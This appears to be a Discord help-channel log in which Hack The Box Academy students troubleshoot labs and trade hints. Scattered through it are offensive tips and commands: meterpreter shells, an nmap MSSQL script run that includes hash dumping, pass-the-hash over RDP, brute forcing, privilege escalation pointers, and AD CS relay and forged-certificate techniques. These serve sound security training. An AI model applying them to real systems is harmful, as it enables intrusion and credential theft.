#modules

1 messages · Page 188 of 1

shell ore
#

osint is taking a wrong turn 😂

silver iris
#

In the AD module, i can´t RDP into the Windows host in the "LLMNR/NBT-NS Poisoning - from Windows" . Tried it with my own system and Attack-Box. xfreerdp stays with a black screen and rdesktop says that the credentials provided are incorrect. Is this still in correlation with pinned message, about spawning/conncetion issues?

next bronze
#

hit enter

limber river
#

what's going on everyone suffering from this black screen lol

next bronze
#

it's just nomal windows things

limber river
silver iris
midnight galleon
#

but this is what osint could be about

limber river
buoyant escarp
#

Osint is boring imo

silver iris
native crow
#

Hey Guys, Has anyone here has issues with ffuf being really slow from a local kali VM? only getting 28 requests per second even using 200 threads

next bronze
native crow
#

This is against the target in the ffuf module

silver iris
wanton idol
#

i am on a rev meterpreter windows shell that was executed on a web asp shell so i can get more of a stable shell, with my meterpreter rev shell i pivioted into a box with proxychains and got in with rdp and im trying to import that pivoted rdp host with powerview but it seems not to work at all

heavy marsh
#

Anyone having connectivity issues with the AD machines?

#

The ip spawns, but the rdp session never opens

silver iris
next bronze
wanton idol
#

all powerview commands gives command is not recognize

heavy marsh
#

Yesterday AD labs worked after about three respawns, now just getting this

next bronze
wanton idol
#

i opened a powershell in rdp and did Import-Module .\PowerView.ps1

#

when i do Get-Module it shows PowerView is imported

next bronze
#

what's the powerview command that you used

wanton idol
#

any command from it, Get-Domain

#

Get-DomainUser

heavy marsh
#

Is there a particular VPN we should be using to gain access to the AD machines? I have tried respawning 5 times already. Can't RDP into the lab

placid edge
#

can you ping the machine?

heavy marsh
#

I just checked.

#

Something is wrong with the windows machines

limber river
#

and single quotes for password

placid edge
#

yeah i was about to say that

#

something simple like ! can ruin the password and would recived without the !

#

so like

Password!23
Would be recived like
Password

#

so either escape special characters or use quotes around it

heavy marsh
#

They were working yesterday, just took a while to connect. I'll read ahead and come back tomorrow.

next bronze
# wanton idol any command from it, Get-Domain

weird I've never seen this happen, run

Get-Command -CommandType Function | Where-Object Source -eq ''

if you don't see any powerview commands, then it probably didn't import correctly or your powerview copy is broken

ebon minnow
#

General question about XSS, why did we need “> at the start of our payloads for the XSS module?

next bronze
#

read the page source

buoyant escarp
ebon minnow
#

Cheers

barren salmon
#

anybody else having problem with acadamy not completing a module when you finished it?

next bronze
#

make sure each sections have a tick on them in the table of contents

next bronze
#

no it doesn't, there's one tick missing

barren salmon
#

ooh i see it now. thank. sorry

#

thanks. sorry for wasting your time.

next bronze
#

all good

sharp sentinel
#

anyone

lusty thicket
#

try with valid creds

sharp sentinel
languid juniper
#

Hey guys in the skills assessment for the CDSA thing is there away of knowing why your answers or wrong or right?

sharp sentinel
gray shoal
#

im having trouble installing linux on my virtual box.. because of uefi settings, can someone please help

sharp sentinel
supple gorge
languid juniper
#

Oh ok

#

Damn that sucks tho

supple gorge
languid juniper
#

No the thing is it’s a multiple choice quiz for the skills assessment so I got the answer anyways and I Agree with u by the way

#

But still some help alone why it’s wrong is good

safe finch
#

Hey ppl

gray shoal
#

if i cant acces my BIOS-UEFI settings, am i doomed and i cant use any virutal machine because i cant enable hypervisor partion?

supple gorge
#

Why wouldn't you be able to access your uefi

gray shoal
#

because i tried youtube guides, chat gpt help and what not to get there

#

something is bugged or something

#

it doesnt go there

next bronze
#

you say it's not working but didn't give any details, what have you tried, what errors? also this isn't a tech support channel

gray shoal
#

im trying to install centos 9 on virtual box, i considered to give up and try other Vm but actully others wont work as well correct?

gray shoal
# next bronze you say it's not working but didn't give any details, what have you tried, what ...

thanks for asking, i tried f12 and del , i tried commands to redirect me there after boot, i tried command to set the after boot directly there, i tried from "recovery" the restart option and i got there. the closest "try" was after i click the uefi firmware settings, it says "restart to change uefi firmware settings" i click restart, and nothing hapens just normal restart straight to desktop

#

this is the error i get : Not in a hypervisor partition (HVP=0) (VERR_NEM_NOT_AVAILABLE).
AMD-V is disabled in the BIOS (or by the host OS) (VERR_SVM_DISABLED).
Result Code:
E_FAIL (0X80004005)
Component:
ConsoleWrap
Interface:
IConsole {6ac83d89-6ee7-4e33-8ae6-b257b2e81be8}

next bronze
#

this isn't a tech support channel, post it at #1024429874246590575 which as much information as you have, especially the steps you tried to get into bios, there should be no reason you couldn't access it

gray shoal
#

thanks i will try. but do you think it fixable?

next bronze
#

there's nothing to be fixed, you just have to enable an option in bios

gray shoal
#

can i dm you?

next bronze
gray shoal
#

thanks i did it

hoary sail
#

Hi, can I ask somebody for help relating "DNS" section of Footprinting module in HTB Academy, please?

fathom pendant
#

Just ask it here dude, it's also likely your question has already been answered here too

#

Discord search be wild

hoary sail
#

it will be the same question as couple days before ... working on DNS in Footprinting module - the 4th question is relating to finding FQDN of a host where the last octet ends with .203. I discovered two zones and used all of the wordlists available in Pwnbox. No host was found. Can somebody give me a hint what wordlist contains that host, please?

limber river
hoary sail
limber river
limber river
hoary sail
hoary sail
limber river
hoary sail
#

this = the "in**al" zone or the second one?

limber river
hoary sail
#

can you share the wordlist you used?

limber river
hoary sail
fathom pendant
#

I believe i said last time: there's more than one subdomain to try

#

A zone transfer will be better on the initial domain, and you've already ruled out the 'internal' subdomain

#

If you run dnsenum against the right subdomain it'll only take a few minutes for it to find your answer

hoary sail
fathom pendant
hoary sail
fathom pendant
#

You don't need to bruteforce internal, it's already freely giving its info to you

fathom pendant
#

It bruteforces them for you

limber river
#

anyone know how to solve this ?
ps : Idk why , but i will not use ligolo for this one

fathom pendant
limber river
next bronze
#

or just grab the binary from github, should work for most gcc versions

hoary sail
fathom pendant
hoary sail
#

many thanks to @fathom pendant and @limber river. I'm going to discover where was the issue

fathom pendant
#

Didn't know gobuster could bruteforce like that

#

But the intended way is with dnsenum

limber river
cedar forum
#

Hey guys, can someone explain how Split-Tunnel VPN work?

#

i am currently reading the module, but i didn't quite catch the meaning

fathom pendant
#

It splits the network connection.

#

The openvpn for HTB is a split-tunnel, you can still use your network connection - while also accessing the internal resources

cedar forum
#

oh i think i understand it now, accessing the VPN's network and accessing the WAN are 2 separate things in this case

#

using a vpn to change your location would be just 1 thing, since you access everything through the same network

#

right?

#

However, for a company, split-tunnel VPN's are typically not ideal because if the machine is infected with malware, network-based detection methods will most likely not work as that traffic goes out the Internet. didn't understand this part either

fathom pendant
#

So using a service to change your location is different

fathom pendant
candid lily
next bronze
#

it's still happening? damn

candid lily
#

bruh still loading whats wrong with htb

gray shoal
#

i hope its ok to offerr it here, im just really desperate, i cant install vm because i have problems not letting me open the BIOS/EUFI settings, ill pay 100 dollars paypal to whoever sorts this problem

candid lily
#

use wsl i guess

gray shoal
#

what is wsl

candid lily
#

windows subsystem for linux

gray shoal
#

can you help me sort the problem?

#

i tried everything youtue google chat gpt has to offer nothing worked

candid lily
#

not without knowing what it is

next bronze
#

or watch a video and see how the guy is pressing the button, getting into bios is fairly simple,

gray shoal
#

its simple when there are no problems

#

there is a problem that make it impossible to me, i need help

#

i tried several ways geting there many times so easy its not

next bronze
#

what problems? your computer literately wouldn't work if there's no bios. like I said, contact whoever built your pc

gray shoal
#

dont even remember who it was, some agent from some company

fathom pendant
#

Then contact the company

#

Surely they have some way to contact their customer support

gray shoal
#

ill order a technnican or something

fathom pendant
#

Either way your technical issues don't belong in this channel

next bronze
#

we've provided all the help we could, only the people who built it can help you now

gray shoal
#

they werent answered anywhere else it thought offering money and maybe somone would know how to fix it here

candid lily
#

is anyone else facing problem on spawning ?

fathom pendant
candid lily
#

🎉 🎉 🎉 finally

delicate kernel
#

You would have to scroll up a lot though.

next bronze
candid lily
#

i can change the location?

next bronze
#

yep, above the pwnbox window you can select the vpn servers

dreamy solar
#

Hello why I don't have a preview? plz

fathom pendant
#

\< and \>

dreamy solar
fathom pendant
#

Also if you take out the grep pipe do you get something?

dreamy solar
#

yes

fathom pendant
candid lily
#

yea i thought i was blind or something

snow ridge
#

In module Windows Privilege escalation and section Pillaging. Last question is: Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.

I restored backup and then moved sam files to my machine and used secretsdump to extract hashes. But that answer section in question is always saying wrong answer. I tried to submit nthash, lmhash, and the whole thing but everytime wrong answer. Did I miss something?

candid lily
#

did you try to log in with the hash?

dreamy solar
fathom pendant
#

¯_(ツ)_/¯

candid lily
snow ridge
#

Got certificate error when trying to pth with xfreerdp and error with evil-winrm too

#

Guess the hash is wrong one then

candid lily
#

no it wont cause certificate error

#

try with /timeout:100000 in xfreerdp

snow ridge
#
[11:13:07:279] [248656:248657] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:13:07:279] [248656:248657] [WARN][com.freerdp.crypto] - CN = PILLAGING-WIN01
[11:13:07:493] [248656:248657] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1 ``` This is the whole failure, there seems to be logon failure too
candid lily
#

oh yea

#

you have to use Administrator hash, are you sure you did that

snow ridge
#

Yeah, I'm sure that Im using that hash, but I dont think the hash is right because the asnwer is section is not accepting it

candid lily
#

dm me the hash

misty saddle
#

Hi all, im currently doing the nmap module in academy and my scans are veeery slow. I'm located in the EU and also use the EU vpn. Whenever I'm on the main HTB platform and scan boxes it's quick. It's only on academy it's this slow.

candid lily
#

show your nmap command

misty saddle
#

sudo nmap -p- -Pn -g 53 10.129.20.50

candid lily
#

-p- will take long

#

add --min-rate 1000

misty saddle
#

Yeah true, I'll try that and see if it helps. Thanks!

dreamy solar
fathom pendant
#

i'm just saying the thing you're grepping for isn't in the output, so maybe they meant to do ?id=2?

#

if that's what the document id from the previous part was

dreamy solar
#

I have my scripts, I just test the basic command it is not okay how to try my commands to know it is okay ^^"

fathom pendant
#

considering the example right after is ?id=3

#

so it seems weird to skip 2

dreamy solar
#

yes ^^"

fathom pendant
#

try restarting the lab then? ¯_(ツ)_/¯

fathom pendant
#

restart the lab then?

dreamy solar
dreamy solar
fathom pendant
#

¯_(ツ)_/¯

#

try running the curl/grep without specifying uid

dreamy solar
#

okok

fathom pendant
#

haven't done this module so idk ¯_(ツ)_/¯

limber river
dreamy solar
#

WEB ATTACKS
Mass IDOR Enumeration

limber river
#

leeme check my notes

limber river
earnest solstice
#

Who knows game programming?

dreamy solar
#

I find!

snow ridge
#

Anyone else been having problems with RDP connections? My connection has been very slow after weekends issues and sometimes I get reconnects. I use remmina and I didn't have any problems last week when I was doing Active directory module. All sessions were pretty smooth. Now its pain to use RDP

fathom pendant
snow ridge
#

@fathom pendant I use UDP one

fathom pendant
#

use tcp

snow ridge
#

Okay, lets try that

limber river
fathom pendant
#

read #welcome on how to access more of the server, there's a #programming channel you'll be able to access

frosty spade
#

hello all i cant for the life of me spawn any targets cleared cache and cookies logged out and in nothing anyone else facing similar issues

copper pine
#

Hey guys can I join somebody’s team for capture the flag?

fathom pendant
#

this isn't the channel

steel grail
# fathom pendant this isn't the channel

Any good resources for privilege escalation? I spent like 4 hours last night in the last portion of the Linux fundamentals knowledge check. I got the first flag but couldn’t get the flag for the root user

fathom pendant
#

there's nothing that's too complex to do

steel grail
#

Hmmm

#

Ok

#

I’ll take another look tonight then

fathom pendant
#

you have user: see what you can do with user

#

iirc this is a sudo -l and a specific binary that you can check gtfobins for

steel grail
#

I couldn’t ssh into user ? Or are you talking about metsploit?

fathom pendant
#

if you have the first flag you have a user

copper pine
#

Maybe I’m a slow one can you help me which server is the right one. My first guess was Academy but like you said I’m wrong. But still can not find any server called: CTF Teams, Joining, and working together or something like that…

steel grail
fathom pendant
steel grail
#

Sudo isn’t a command option when I’m in the server through metsploit

fathom pendant
fathom pendant
copper pine
#

So then I should quit this channel?🤣 Bro I’m a newbie I have no idea yet with hackthebox

#

I’m sry for bothering man

fathom pendant
steel grail
#

Oh…. Ya know what. I think I know who I can ssh into the server as. The user profile I found the flag in while I was using metsploit

fathom pendant
steel grail
#

I used msfconsole to find an exploit and used the exploit

#

I changed the ip and LHOST and did the exploit command and got in

fathom pendant
#

Yes.

steel grail
#

That’s how I got the first flag

fathom pendant
#

If you type in shell, it'll drop you into the system

#

From there you can do everything else

steel grail
#

Can I use a shell command in metsploit console ?

fathom pendant
#

Not really

oblique spoke
#

hi! i got a bit stucked at the command injection assessment 😄 i dont think i found the place where i can inject the commands and accept it. Can someone point me to a directions?

fathom pendant
#

It's a lot simpler/easier to just drop in and do from there

steel grail
#

I found the flag in a profile called mrb3n or something in metsploit would I use that profile to ssh into the server ?

fathom pendant
steel grail
#

I know

fathom pendant
#

You don't use .profile to ssh

steel grail
#

I know that but you need a password for any user

fathom pendant
#

Besides if you do sudo -l it may be more enlightening

#

Than just guessing

steel grail
#

1 sec

fathom pendant
#

Always see what your user can do

steel grail
#

What I was thinking is ssh mrb3n@<server_IP> that’s the user dir I found the first flag in

#

Or would it just be user@<server_ip>

#

Oh wait

#

I’m dumb as fuck

fathom pendant
#

You're already a user

steel grail
#

Sorry Marcie I was mixing shell and ssh

steel grail
fathom pendant
#

Yes

#

I just was referring to msfconsole

#

To drop into the session

steel grail
#

… yes I did use msfconsole to drop in. That’s how I got the first flag

#

Is something getting lost in communication ? I feel like I’m missing something

last glen
#

Is there anybody named One-Nine9 here? I received a notification from this guy saying that my account appears in a publicly disclosed data breach

next bronze
#

meterpreter and the system shell are two different things, you can get a system shell in meterpreter by running shell

steel grail
#

After I connect to the exploit or before ?

#

I’m confused what step i should do this in

next bronze
#

meterpreter:
meterpreter> shell

oblique spoke
swift dune
#

Hi All,
Regarding ADCS ESC11 first qa is to compromise WS01 but when WS01 is CA is it possible to be relayed to some of the templates ? ( because I tried to all of them but no success and when relay the DC getting the cert)
Thanks

steel grail
next bronze
next bronze
fathom pendant
steel grail
#

So once I’m in the server where I found the flag

fathom pendant
#

How can you drop into a session if you don't have the exploit runnkng

swift dune
next bronze
#

self relay is not possible, yes

steel grail
#

Isnt running the exploit already dropping into the session?

next bronze
#

meterpreter session and the system shell are two different things

steel grail
#

Hm ok I’ll swing back once I’m home I think it’ll make more sense to me if I have it in front of me

swift dune
#

Great, Thanks for confirmation.

@next bronze Just one more question regarding Certificate Mapping.
I played some time with it but the thing that cannot figure out is when this is happening when Certificate is used to authenticate to the DC for example getting TGT or also when we enroll to receive certificate ?

Because when I perform Golden Cert attack and generate Certificate with it with ForgeCert for example the SID is not presented and getting error ( when Mapping is set to 2 ) but when I request new certificate with the already forged one and adding the SID the certificate authenticate and get TGT successfully. And for this I am thinking that Mapping is only in the DC when Certificate is used to authenticate but not 100% sure

next bronze
#

not sure about that one, don't remember having to specify the sid when I did it, you can use -debug to get more info

dull moth
#

INFORMATION GATHERING - WEB EDITION
trying to get the curl from app.inlanefreight.local but im getting error: [★]$ curl -I "http://${TARGET}"
curl: (6) Could not resolve host: app.inlanefreight.local
can anyone help me please?

swift dune
# next bronze not sure about that one, don't remember having to specify the sid when I did it,...

Actually this is the problem that I cannot see but as from prob and test I assume that Forging Cert for template even without SID is going to be forged and received but when you try to auth to the DC will receive an error SID not match or something similar. and in this H case with the gold cert was working to forge new fixed with the old one that is not accepted by the DC
Will try also to look into the logs

Thanks again for the help really appreciated

fathom pendant
next bronze
swift dune
#

@next bronze A, no not that param (-subject) its called /sidextension:.
not sure if there is documentation you can find it in the github source code

next bronze
#

oh you're using certify?

swift dune
#

its available for both the C# one and Python one

#

-extensionsid for the certipy and /sidextension for the certify

next bronze
#

should just be -sid for ceritpy

#

https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d

From an updated [MS-WCCE]: Windows Client Certificate Enrollment Protocol section 2.2.2.7.7.4, “The CA MUST consider this extension [szOID_NTDS_CA_SECURITY_EXT] from request attributes only when the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is set on the corresponding certificate template object.” That is, when requesting an “enrollee supplied subject” certificate the szOID_NTDS_CA_SECURITY_EXT is not set in the certificate by the CA by default. Rather, the requesting user is allowed to supply the szOID_NTDS_CA_SECURITY_EXT extension in the request.

In fact, once May 9, 2023 hits, all requesters will have to supply the szOID_NTDS_CA_SECURITY_EXT extension value as without that value (or a strong mapping) present in the resulting certificate, authentication against the DC will not work.

We have recently updated this in Certify with the /sidextension:<S-1-…> flag to support this. It uses code from Carl Sörqvist to build the extension properly and include it with a certificate request for a template with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set.

swift dune
#

mhmm did not test -sid I am using this one extension from certipy

#

But this could be due to different version of the certipy will check the new one

next bronze
#

might be, I have the latest version and there's no -extensionsid option

steel grail
#

I’ll message you when I’m back home

fathom pendant
swift dune
ocean flume
#

Somebody please help 😵‍💫😵‍💫 I’m on windows priv esc first assessment I can’t find the file with the ldap admin credentials

swift dune
#

@next bronze Just out of curiosity ESC11/8 could be done also with machine acc credentials ( I mean to invoke/trigger Coercer for example ) ? ( Because never tested it )

dull moth
next bronze
steel grail
#

Cause the hint for the root flag is LinPEAS and another thing for privilege escalation ?

fathom pendant
steel grail
#

Then the hint is wrong or something…. Hmm

fathom pendant
#

Msfconsole has an upload/download command

#

The hint is to use linpeas to find the weak point

#

It's pointing you in the direction

calm tapir
#

Need assistance with Password Attack Lab - Hard. I can't seem to bruteforce Johanna's password. I used cme with the mutated wordlist, given password list, and rockyou but either it doesn't find the password or takes hours to go through each listed word.
Any tips?

steel grail
fathom pendant
swift dune
# next bronze like `Coercer coerce -u 'machineacc$'`? yeah any domain creds will work

That's making some things more easier to gain access.

Just encountered case when relayed normal machine (low priv) to DCs template and got only the priv key of the low priv machine. And saw that is part of THEFT4 and was wondering how this private key can be used to enroll for certificate ?
I think this need to be done manually like creating and singing the CSR but did not find any option in certipy/fy for that ?

steel grail
#

I see now

swift dune
ocean flume
#

Nvm guys I found it

manic onyx
#

This isn't related to a module per se, but every time I use SharpHound to generate BloodHound data, I am unable to import the computers.json file. This is on both pwnbox and my own machine. Everything works fine with bloodhound-python. Has anyone else experienced this?

#

I've tried updating BloodHound and getting latest Sharphound release

next bronze
#

the latest sharphound is only compatible with bloodhoundCE

fathom pendant
#

There's still a free version

tight mesa
#

sorry bother you @languid fjord or any other moderator, but the Spawn machines issue is still present?

languid fjord
#

afaik, things are working okay as of now

tight mesa
#

ok., thanks, lemme check if I'm the issue LoL

fathom pendant
#

The issues seem to be intermittent at best atm

languid fjord
#

was able to spawn targets on eu-1 just fine here

frank tendon
#

Hey all, I am having a hard time with the Javascript Deobfuscation Module: Deobfuscation question. I have gone through everything and I fully understand the concepts; however when I use the tools I am getting errors in the results and the question will not accept the flag. I know that JSNice no longer works with the module, but I'm stumped as to where to go from here. Any help would be awesome!

fathom pendant
frank tendon
tight mesa
languid fjord
#

which module?

tight mesa
#

Windows PrivEsc

fading cipher
#

hello guys, im having some trouble in the linux module

#

with this question : Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

#

i can't get the answer right, i need some help

fathom pendant
frank tendon
fathom pendant
#

Nope

#

The print method is used to unpack it

#

It's explained in the module about using print

frank tendon
fathom pendant
languid fjord
tight mesa
frank tendon
# fathom pendant

I just found it! I think my eyes glazed over it the first time lol, now I feel foolish. Thanks again!

fathom pendant
#

It happens

#

it just sucks JSNice doesn't have that functionality anymore ¯_(ツ)_/¯

frank tendon
# fathom pendant It happens

Yeah it does, I'm just having trouble knowing where to plug in the console.log bit, do I replace 'return' with it?

fathom pendant
#

You can, yeah

#

I believe that's what I did

#

I mostly glazed over this module

frank tendon
fathom pendant
#

I just input a print statement instead of the execute ¯_(ツ)_/¯

#

I think I replaced eval with print

frank tendon
fathom pendant
#

It also looks like there's other sites that's mentioned

#

So they must've updated it since I last glossed it over

frank tendon
fathom pendant
#

Ye

#

Also for the skill assessment, read the questions carefully

#

It's easy to get ahead of yourself in it

frank tendon
fathom pendant
#

That really goes for any of the module questions, sometimes you can overthink the questions

regal sigil
#

Hey, I am trying to solve the mssql service in the footprinting module, The first question asked to list the hostname of the Mssql server , i ran nmap for it sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248 but getting this as output

hardy socket
#

Hey everyone, I'm still struggling to connect to the host in Kerberos Atacks, Kerberoasting from Linux. The ssh connection times out. Earlier this week (or the end of last week?) there was an issue with the eu servers so I attributed it to that, but that was resolved, no? Can anyone check it out please?

fathom pendant
#

But you can also just use other methods of getting the server hostname

#

Also don't set any script args, maybe that'll net more results

#

you'd need to add the debug flag to know more ¯_(ツ)_/¯

regal sigil
# fathom pendant You can just do ms-sql* btw for the script thing

NSE: ms-sql-dac against 10.129.133.95:1433 threw an error! /usr/bin/../share/nmap/nselib/mssql.lua:3334: bad argument #1 to 'ipairs' (table expected, got nil) stack traceback: [C]: in function 'ipairs' /usr/bin/../share/nmap/nselib/mssql.lua:3334: in function </usr/bin/../share/nmap/nselib/mssql.lua:3327> (...tail calls...)

#

Getting this error, when i used the -d flag

fathom pendant
#

¯_(ツ)_/¯

#

I never had any issues with the section so idk what your issues may be

fathom pendant
#

Ah nmap version issue

regal sigil
#

This included the issue though still dont know how I can fix it

fathom pendant
#

Maybe you can downgrade your nmap to an earlier version and it'd work

regal sigil
#

will try

fathom pendant
#

But you can also just try doing -A to see if that gives you a device hostname

regal sigil
#

How can i downgrade??

fathom pendant
#

Search "apt downgrade"

#

Google is a fantastic resource for these things

fickle hearth
#

Hello. Anybody found any issue with flags in academy? On Nmap module (NSE scripting), looks the HTB{} flag found is not recognised as correct....

fickle hearth
fathom pendant
#

Double check

#

Sometimes it's tricky

regal sigil
#

for parrot

fathom pendant
#

It's not gonna be for parrot

#

It'd be a version list for nmap

fickle hearth
regal sigil
#

ok i feel stuck

#

i will just use my vm

fathom pendant
#

Also if you are still using script args, you should specify a blank password with ""

regal sigil
fathom pendant
#

¯_(ツ)_/¯

regal sigil
#

well i am trying on my local vm, hope it works

rotund sphinx
#

"Examine the target" this means break in right?

fathom pendant
versed dawn
#

Hello guys im new in the platform!

#

hope i can achieve my goal with it

fathom pendant
potent ermine
#

I tried the lab just now and it worked. I'm using a Parrot VM, and used 'eu-academy-1' VPN connection.
I did have to wait over 20 minutes to be able to RDP to the bob user from within the Kali target

rotund sphinx
# fathom pendant It means look at it via whatever means you can

it seems such a casual way of putting it :p
guess im up to the point where breaking in is a given.
up until now its either given credentials and then had to find more info with them, or the question has been to find those credentials
this one the first question just assumes that i already have access to the target without giving that access

fathom pendant
#

The module should have prepared you enough to that point for you to make the right step forward

regal sigil
rotund sphinx
#

this module on its own didnt (thats what i mean, the whole text of the module is what to look for once you are already on a target) but hopefully i have learnt enough in general 🤞

fathom pendant
#

Bc I can guarantee you they gave you info on how to look for stuff

rotund sphinx
#

well i guess actually the module technically did, its the section that didnt say anything

Password Attacks -> Linux Credential Hunting

fathom pendant
#

Oh

#

You need to save all credentials you find in that module

rotund sphinx
#

i dont need help (at least not yet) i was just a bit surprised at how it suddenly jumped to just assuming i could access a target

fathom pendant
#

You just need to use a set of credentials you grabbed earlier

rotund sphinx
#

ah interesting, i do have most of them i was just working out which service would be easiest to attack

fathom pendant
#

All the linux targets are linked in this module, same with the windows

#

This is why I believe I advised on saving all credentials you find when you first started this module

#

This is why

rotund sphinx
#

ye tbh i was already saving most of the info i found anyway

#

i have like this for every module / section

calm tapir
#

Hey still working on Password Attack Lab - Hard and been working the brute force all day with no results. I've tried on|| WinRm, SMB, and RDP using CME and Hydra for user Johanna using the mutated list, password.list, and rockyou||. Can anyone provide any guidance on what I may be doing wrong?

fathom pendant
#

Is there a null session on SMB?

#

I forget this lab

calm tapir
fathom pendant
#

Did you get a username?

#

That should be your first step

calm tapir
#

Just the one provided from the scenario

#

||Johanna||

fathom pendant
#

Just reread your thing. But yeah shouldn't be much, rdp should be an easy thing

thin parrot
#

Why does this course give you questions that you arent taught to answer in the module???

#

I mean wtf this is a scam operation lmao

calm tapir
fathom pendant
thin parrot
#

The forum literally proves that too, this is literally a setup lmao

fathom pendant
#

Linux basics is kinda shit but it's not impossible

thin parrot
#

" What is the path to the htb-student's mail?"
You can't get that without using cat or grep

fathom pendant
#

I mean the env command exists

hallow kiln
fathom pendant
#

^

fathom pendant
thin parrot
#

man env says literally says 'run a program in a modified environment'

hallow kiln
fathom pendant
thin parrot
fathom pendant
thin parrot
#

You dont put the instructions on the second page and the exam on the first thats just brainlet logic

fathom pendant
#

A lot of this module I'll concede is out of order

hallow kiln
calm tapir
thin parrot
#

Well then they should get off their lazy asses and fix it

fathom pendant
#

But it's not a scam lol, most of the modules are better than that one though

fathom pendant
rotund sphinx
#

or more generally, info that might be useful for the particular module

fathom pendant
#

Besides, the tier 0 modules refund their cost when you complete it

rotund sphinx
#

also a shorter list of commands is at the very top of the first section with questions

fathom pendant
#

So it's not like you actually pay anything for them

thin parrot
#

Just very frustrating because I don't like to cheat in any sense

#

and I don't like wasting an hour to realize the information isn't even given to us prior to the exam

hallow kiln
#

the cheat sheets aren't cheating

next bronze
#

god forbid you do research and use google kek

fathom pendant
#

The cheat sheets are just a compilation of the commands in the module, generally without context

thin parrot
#

I'm not afraid of doing research but I feel that its a waste if you're not trying to figure out things. I take the same approach with programming I don't like to go and find the answer without thinking about the problem and using the bare tools given to me to figure it out. How else will I improve? I didn't realize that things may be out of order I expect more out of a site that has subscription plans as high as $68 a month you'd think they'd polish what they charge for.

#

Guess I have to refer to this sheet

rotund sphinx
#

the command you needed is listed at the start of the section

hallow kiln
fathom pendant
hallow kiln
#

in any case this is a field where research and google are your best friend

fathom pendant
#

Some of the sections are out of order, but not impossible

#

¯_(ツ)_/¯

thin parrot
#

Fair enough
And yeah I started this course because a company was willing to help me get situated with pen-testing as long as I complete this course entirely. So I'm trying to hold myself to be very knowledgeable so I can have competency in the minimum expectations they have for me once they take me in

hallow kiln
#

they want you to complete the pentester path?

thin parrot
#

Yes

#

Also wanted me to pick up Python

hallow kiln
#

then stick it out, you'll be pleasantly surprised when you get into it

thin parrot
#

I hope so I'm only familiar with software engineering and nothing else, I'm going blindly into this. I can't even figure out how to use grep the terminal stops responding when I try using it 💀

thorn urchin
hallow kiln
fathom pendant
thorn urchin
#

#858470491676737536 message

btw studying after taking an exam has been proven to be one of the most effective strategies for learning the information

fathom pendant
thorn urchin
rotund sphinx
#

are those articles on topic for this channel ? 🤔

thorn urchin
#

yes

#

were discussing the Linux Fundementals module and its structure

thin parrot
hallow kiln
#

that's not gonna happen 💀

thin parrot
#

I worked with Linux a very very long time ago and remember practically nothing

#

Yeah no it isn't 💀

fathom pendant
#

Most of the people that are new on average spent 3 months on it

thorn urchin
#

I know very experienced people that havnt burned through the course in a single month

thorn urchin
thin parrot
#

I'm giving myself a minimum of 15 hours a week to be working on this, I also have to allocate time to work on making sure I don't fall back on programming skills again

fathom pendant
#

The other thing in this field is patience

#

And waiting for a tool to do its thing

rotund sphinx
#

having the programming skills is good for some bits of it i think

thin parrot
#

and I have a part time job starting up soon so that'll make this interesting

noted lol

#

Thats what he said but I think I have to pick up other languages most my experience was with Java then C++.

fathom pendant
thorn urchin
#

learning both at the same time can be difficult for beginners

thin parrot
#

I'm assuming brute force is the one that takes the longest? 😂

fathom pendant
#

Yep

thorn urchin
#

at least you have prior dev exp, thatll make the programming learning quicker

thin parrot
#

definitely but this feels like learning from square one again

fathom pendant
#

Most programming stuff is easily transferable

thin parrot
#

It took me nearly 3 years to understand object oriented programming

thorn urchin
#

and 3 more years to understand OO is shit kek

fathom pendant
#

If you want experience with learning Linux command line stuff, I highly recommend a command line/terminal game called "bashcrawl"

#

Its unironically a decent way to learn some basic navigation commands

#

pushd and popd are super handy if you need to temporarily switch to a different directory

thorn urchin
#

spend a weekend installing LFS

thin parrot
#

I'll look into it I definitely want to have the basic commands down

#

Well I figured out the question but I'm confused with how I was supposed to know I had to ||use cat /var/passwd ... how was I supposed to know its located in /var/passwd||

fathom pendant
#

What's the question?

#

Also I've not heard of /var/passwd, I've heard of /etc/passwd

rotund sphinx
#

ok i give up 😦 cany anyone confirm/deny if ||sam ||is the correct user to be logging in as for linux credential hunting unit (i can get in but then not access a bunch of the files that are relevant to the section text)

rotund sphinx
#

ok thanks

thin parrot
#

:( this is flying over my head, none of these questions relate to whats taught on this page besides the first two

fathom pendant
#

You can use Sam though to check /home/

fathom pendant
#

There's no shame in asking for assistance

#

I may have been mistaken about you already having these creds

#

I forget if credential hunting is early or late in that module

rotund sphinx
rustic sage
fathom pendant
thin parrot
#

Well, with the question What is the path to the htb-student's mail? How am I supposed to figure out what to use? || cat is shown later, and I don't know why cat /var/passwd worked. It showed me /var/mail in the list and I assumed mail would have a folder for /htb-student so I entered /var/mail/htb-student and it was correct||

rustic sage
#

I give the answer : /var/mail for the question + 0 What is the path to the htb-student's mail?

fathom pendant
thin parrot
#

oh

rotund sphinx
#

looks like we now have 2 people on the same section :p

steel grail
#

That’s a hint

thin parrot
rustic sage
#

I try that and i come back if i lose

fathom pendant
thin parrot
#

🤦‍♂️

rotund sphinx
#

||env ||command is useful for finding info/settings for the current user

fathom pendant
#

And even explained that if you use the command on its own, it lists all environment variables

thorn urchin
#

yup

fathom pendant
#

In the format
VARIABLE=VALUE

thorn urchin
#

